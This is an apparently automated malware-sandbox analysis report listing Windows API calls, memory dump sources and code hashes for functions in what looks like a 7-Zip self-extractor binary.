                                                                • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                • String ID: IA
                                                                • API String ID: 3462485524-3293647318
                                                                • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                • String ID: 0x%p
                                                                • API String ID: 2530384128-1745605757
                                                                • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                APIs
                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$??3@
                                                                • String ID: 100%%
                                                                • API String ID: 2562992111-568723177
                                                                • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                APIs
                                                                • wsprintfW.USER32 ref: 00407A12
                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                • String ID: (%u%s)
                                                                • API String ID: 3595513934-2496177969
                                                                • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetNativeSystemInfo$kernel32
                                                                • API String ID: 2574300362-3846845290
                                                                • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                • API String ID: 2574300362-3900151262
                                                                • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                • API String ID: 2574300362-736604160
                                                                • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                  • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 1731127917-0
                                                                • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                • wsprintfW.USER32 ref: 00403FFB
                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                • String ID:
                                                                • API String ID: 1746483863-0
                                                                • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                APIs
                                                                • CharUpperW.USER32(?,76B0E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CharUpper
                                                                • String ID:
                                                                • API String ID: 9403516-0
                                                                • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                APIs
                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                • String ID:
                                                                • API String ID: 2538916108-0
                                                                • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                • DeleteObject.GDI32(00000000), ref: 00406878
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                • String ID:
                                                                • API String ID: 1900162674-0
                                                                • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                APIs
                                                                • memset.MSVCRT ref: 0040749F
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                • String ID:
                                                                • API String ID: 1557639607-0
                                                                • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                APIs
                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                • String ID:
                                                                • API String ID: 612612615-0
                                                                • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                APIs
                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@TextWindow$Length
                                                                • String ID:
                                                                • API String ID: 2308334395-0
                                                                • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                APIs
                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                • String ID:
                                                                • API String ID: 2001801573-0
                                                                • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00401BA8
